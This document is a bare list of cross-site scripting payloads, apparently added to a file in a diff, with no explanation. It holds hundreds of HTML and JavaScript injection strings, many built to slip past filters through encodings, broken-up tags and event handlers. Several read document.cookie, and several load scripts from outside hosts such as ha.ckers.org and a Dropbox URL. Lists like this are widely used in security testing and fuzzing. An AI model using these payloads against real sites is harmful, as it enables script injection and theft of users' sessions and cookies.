+</TITLE><SCRIPT>alert("XSS");</SCRIPT> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="width: expression(alert('XSS'));"> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> +<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION +<form><button formaction="javascript:alert(123)">crosssitespt +<frameset onload=alert(123)> +<!--<img src="--><img src=x onerror=alert(123)//"> +<style><img src="</style><img src=x onerror=alert(123)//"> +<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="javascript:alert(1)"> +<? foo="><script>alert(1)</script>"> +<! foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<script>({0:#0=alert/#0#/#0#(123)})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script> +<script src="#">{alert(1)}</script>;1 +<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script> +<svg xmlns="#"><script>alert(1)</script></svg> +<svg onload="javascript:alert(123)" xmlns="#"></svg> +<iframe xmlns="#" src="javascript:alert(1)"></iframe> ++ADw-script+AD4-alert(document.location)+ADw-/script+AD4- +%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- ++ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- +%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- +%253cscript%253ealert(document.cookie)%253c/script%253e +“><s”%2b”cript>alert(document.cookie)</script> +“><ScRiPt>alert(document.cookie)</script> +“><<script>alert(document.cookie);//<</script> +foo<script>alert(document.cookie)</script> +<scr<script>ipt>alert(document.cookie)</scr</script>ipt> +%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E +‘; alert(document.cookie); var foo=’ +foo\’; alert(document.cookie);//’; +</script><script >alert(document.cookie)</script> +<img src=asdf onerror=alert(document.cookie)> +<BODY ONLOAD=alert(’XSS’)> +<script>alert(1)</script> +"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> +<video src=1 onerror=alert(1)> +<audio src=1 onerror=alert(1)> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" +<script/src=data:,alert()> +<marquee/onstart=alert()> +<video/poster/onerror=alert()> +<isindex/autofocus/onfocus=alert()> +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; +&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097& +#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</script><script>alert('XSS');</script> +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*"); +xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> +<BASE HREF="javascript:alert('XSS');//"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" +veris-->group<svg/onload=alert(/XSS/)// +#"><img src=M onerror=alert('XSS');> +element[attribute='<img src=x onerror=alert('XSS');> +[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] +%22;alert%28%27RVRSH3LL_XSS%29// +javascript:alert%281%29; +<w contenteditable id=x onfocus=alert()> +alert;pg("XSS") +<svg/onload=%26%23097lert%26lpar;1337)> +<script>for((i)in(self))eval(i)(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> +<sCR<script>iPt>alert(1)</SCr</script>IPt> +<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> +%253Cscript%253Ealert('XSS')%253C%252Fscript%253E +<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> +<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; +<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<INPUT TYPE="BUTTON" action="alert('XSS')"/> +"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF +"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> +"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> +><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr +g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 +<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> +"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> +"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> +<iframe src=http://xss.rocks/scriptlet.html < +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<iframe src="&Tab;javascript:prompt(1)&Tab;"> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt >alert&lpar;1&rpar; {Opera} +<img/src=`` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=``&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /**/>/**/alert(1)/**/</script /**/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'> +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe// src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg 